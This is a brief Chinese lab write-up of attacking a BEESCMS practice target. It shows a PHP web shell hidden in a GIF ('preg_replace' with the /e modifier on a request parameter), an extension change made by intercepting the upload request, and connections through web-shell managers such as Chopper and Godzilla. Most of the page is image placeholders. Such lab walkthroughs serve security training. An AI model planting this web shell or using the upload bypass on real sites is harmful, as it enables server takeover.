web靶场-beescms

215 阅读1分钟

image.png

image.png

上传图片木马 pass-q.gif

<?php /*F02572*/preg_replace('<.*>e','\0',$_REQUEST['q']);?>

image.png 抓包修改后缀名为php

image.png

得到路径../upload/img/202307021615388231.php

拼接路径得到 bees.lan/upload/img/…

蚁剑不行

image.png 菜刀可以 image.png

中国菜刀也可以

image.png

试试哥斯拉的

image.png

bees.lan/upload/img/…

image.png

image.png

image.png